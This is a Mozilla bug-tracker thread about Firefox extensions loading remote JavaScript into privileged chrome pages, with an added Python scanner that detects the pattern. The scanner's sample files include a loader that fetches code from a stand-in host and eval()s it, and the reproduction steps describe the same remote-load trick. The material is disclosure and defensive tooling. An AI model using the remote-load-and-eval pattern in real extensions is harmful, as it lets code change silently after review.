chrome javascript privilege vulnerability with extensions

Status: RESOLVED WONTFIX
Severity: critical
Reporter: jason_nospam (Unassigned)

Description (Reporter)

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1

Extensions are able to include an HTML file within the chrome directory. This HTML file and its JavaScript have higher privileges than pages loaded from the internet. It is possible to include an almost blank HTML file in an extension which references a JavaScript file from the internet. This JavaScript file can then use document.write statements to write HTML to the file within the chrome directory. This HTML document created from the external JavaScript statements will then have normal chrome privileges even though the page was effectively loaded from a remote internet location.

With this vulnerability it would be possible for a regular useful extension to propagate through the community unnoticed and then, once widespread adoption has been achieved, change the remote JavaScript to include some malicious code that will have chrome privileges.

Reproducible: Always

Steps to Reproduce:
1. Install the privilege test extension that is attached
2. Navigate to chrome://privtest/content/test.html
3. This chrome HTML page will load a JS file from yellowgorilla.net, and in this JS is a JavaScript statement to show the Firefox preferences page, something that chrome privileges are needed to do.
4. Click the "Options" link to show the options page

Actual Results:  
the options page is displayed

Expected Results:  
As the HTML page was effectively loaded from the internet, the JavaScript should not be allowed to execute.
Comment 1 (Reporter)

13 years ago
Created attachment 201483 [details]
An extension that demonstrates the vulnerability

Comment 2

13 years ago
Extensions have same privileges as Firefox.  You have to trust the authors of extensions you use, or audit each version.
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → WONTFIX
Comment 3 (Reporter)

13 years ago
(In reply to comment #2)
> Extensions have same privileges as Firefox.  You have to trust the authors of
> extensions you use, or audit each version.
> 

The point of this bug is that an audit would not pick this up, as the code can be changed at a later date after installation and from a remote location. In the attached extension, the code with chrome privileges originates from my website yellowgorilla.net. I could in effect change this at any time.
Status: RESOLVED → UNCONFIRMED
Resolution: WONTFIX → ---
Comment 4 (Reporter)

13 years ago
(In reply to comment #3)
> (In reply to comment #2)
> > Extensions have same privileges as Firefox.  You have to trust the authors of
> > extensions you use, or audit each version.
> > 
> 
> The point of this bug is that an audit would not pick this up as the code can
> be changed at a later date after installation and from a remote location. In
> the attached extension, the code with chrome priviledges originates from my
> website yellowgorilla.net. I could in effect change this at any time
> 


Maybe I didn't explain myself clearly. The bug is not that chrome files have higher privileges. I understand this. It is that the code that has these higher privileges can be loaded from a remote internet location.

The auditing process obviously needs to include detection of extensions that include remote content. This comes down to whether or not you trust the extension; there are plenty of other bad things it could do without having to load remote content.

Comment 6

13 years ago
If an extension has the same privileges as Firefox, it can obviously use those privileges to download remote code and execute it with the same privileges.  As Gavin said, you should notice when an extension is doing that when you audit it.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → WONTFIX
Extensions have access to the networking and file components -- they can download and overwrite themselves. Extensions can download a string from just about anywhere--even the URL of a redirect would work--and then eval() it. The only thing you can do is say that whole class of actions is unauditable and either suspicious or unsafe.

As addons.mozilla.org has grown beyond our known community we have instituted a policy that the extensions we host not do this kind of thing. Extensions from elsewhere you either need to audit or trust that their source has done so.

Installing an extension is installing software, with all the same risks as downloading some random .exe off the web. Use the same decision process about whether to trust them.
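The audit step that Gavin's comment asks for ("detection of extensions that include remote content") and the download-and-eval() pattern described in the comment above, as an added example that is not part of this bug report or of Mozilla's tooling: a heuristic scan over the text files in an extension's chrome/ tree. The file paths, the remote.example host and the sample XPI contents are constructed for the demonstration.

```python
import re
from collections import namedtuple

# Line-level checks for what the thread describes: chrome HTML pulling a script
# from the network, chrome JS eval()ing a string, remote URL literals, and
# document.write() injecting markup into a chrome document.
CHECKS = (
    ("remote-script-include",
     re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//[^"\'\s>]+', re.I)),
    ("dynamic-eval", re.compile(r'\b(?:eval|new\s+Function)\s*\(')),
    ("remote-url", re.compile(r'["\'](?:https?:)?//[^"\'\s]+["\']')),
    ("document-write", re.compile(r'\bdocument\.write(?:ln)?\s*\(')),
)

Finding = namedtuple("Finding", "path line kind detail")

def audit_extension(files):
    """files maps each path inside the XPI to its text. Only the chrome/ tree is
    chrome-privileged, so other files are skipped; one finding per line."""
    findings = []
    for path in sorted(files):
        if not path.startswith("chrome/"):
            continue
        for lineno, line in enumerate(files[path].splitlines(), 1):
            for kind, rx in CHECKS:          # ordered most specific first
                m = rx.search(line)
                if m:
                    findings.append(Finding(path, lineno, kind, m.group(0)))
                    break
    return findings

def needs_review(findings):
    """True if chrome content includes a remote script outright, or one chrome
    file both names a remote URL and evaluates strings dynamically."""
    kinds = {}
    for f in findings:
        kinds.setdefault(f.path, set()).add(f.kind)
    return any("remote-script-include" in k or {"dynamic-eval", "remote-url"} <= k
               for k in kinds.values())

# Constructed sample XPI contents, not the attached extension's actual files.
SAMPLE_XPI = {
    "chrome/privtest/content/test.html":
        '<html><body>\n<script src="http://remote.example/privtest.js"></script>\n'
        '</body></html>\n',
    "chrome/privtest/content/loader.js":
        'var req = new XMLHttpRequest();\nreq.open("GET", '
        '"https://remote.example/update.js", false);\nreq.send(null);\n'
        'eval(req.responseText);\n',
    "install.rdf": '<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/>\n',
}
```

A match is a lead for the human reviewer, not proof of malice; a legitimate extension can also download and evaluate code, which is exactly why the comments above call the whole class of behaviour unauditable rather than simply forbidden by the platform.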
Comment 8 (Reporter)

13 years ago
> Installing an extension is installing software, with all the same risks as
> downloading some random .exe off the web. Use the same decision process about
> whether to trust them.
> 

So should I take it that that means all the publicity that Firefox is inherently safer than Internet Explorer because it doesn't implement the ActiveX system is false? There is a public perception that this is the case and this could be dangerous (a false sense of security).

Comment 9

13 years ago
The main problems with ActiveX were that it 

(1) had a confusing warning dialog for installing new software and 
(2) exposed a zillion poorly audited modules to web content by default.

Firefox's extension mechanism does not have the first problem and the second problem isn't relevant.